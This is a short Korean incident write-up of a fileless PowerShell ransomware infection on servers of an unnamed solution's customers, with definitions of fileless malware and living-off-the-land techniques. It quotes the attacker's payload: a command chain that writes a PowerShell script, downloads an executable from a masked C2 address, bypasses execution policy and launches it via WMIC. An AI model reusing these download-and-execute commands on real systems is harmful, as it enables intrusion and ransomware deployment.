파워쉘 파일리스 악성 코드 감염 사례
피해 사례
xxx 솔루션 사용 고객사 동일한 공격 벡터로 다수 서버 랜섬웨어에 감염
해커가 사용한 공격 방법
보안 취약점을 이용하여 원격 명령 실행 / 파월쉘 스크립트 실행
공격 벡터(보안 홀, 보안 취약점)는 민감 사항으로 기술 하지 않겠습니다.
현재는 취약점 보완 조치 완료됨.
원격에서 powershell script 실행 페이로드
"echo $client = New-Object System.Net.WebClient > %TEMP%\qaestaxxx.ps1 & echo $client.DownloadFile("http://1xx.5x.xx6.x7/ZdfxxxgU.exe","%TEMP%\0VCxxxE.exe") >> %TEMP%\qaestaxxx.ps1 & powershell -ExecutionPolicy Bypass %temp%\qaestaxxx.ps1 & WMIC process call create "%TEMP%\xxxM71E.exe""'"
powershell script 내 C2 서버로 부터 악성코드 다운로드
$client = New-Object System.Net.WebClient $client.DownloadFile("http://91.x1.1x.10x/TWsTWqgRFxxxxx.exe","C:\Windows\TEMP\CAU81xxx.exe")
윈도우 서버 windows event log 에서도 확인 가능
악성코드 설치 후 랜섬웨어 감염 코드 실행
[용어 정리]
파일리스(Fileless)
파일리스(Fileless)란 희생자의 컴퓨터의 저장장치에 악성 파일을 저장시키지 않고 시스템 메모리에 바로 로드되어 실행되는 것을 의미한다. 해당 방식을 이용하여 실행되는 악성코드를 파일리스 악성코드(Fileless Malware)라고 지칭한다. 그에 따라 하드디스크와 같은 저장 장치에 저장된 파일들을 스캔하는 일반적인 방식으로는 악성코드를 탐지할 수 없다.
Living-Off-The-Land 기법
Living-off-the-land 기법은 해커와 같은 공격자들이 시스템에 이미 설치되어 있는 정상적인 도구를 사용하거나 간단한 스크립트, 코드를 메모리에서 직접 실행하는 기법이다. 피해자 시스템에 기본으로 설치되어 있는 정상적인 프로그램을 활용하여 공격을 수행하기 때문에, 백신의 탐지를 회피할 수 있다.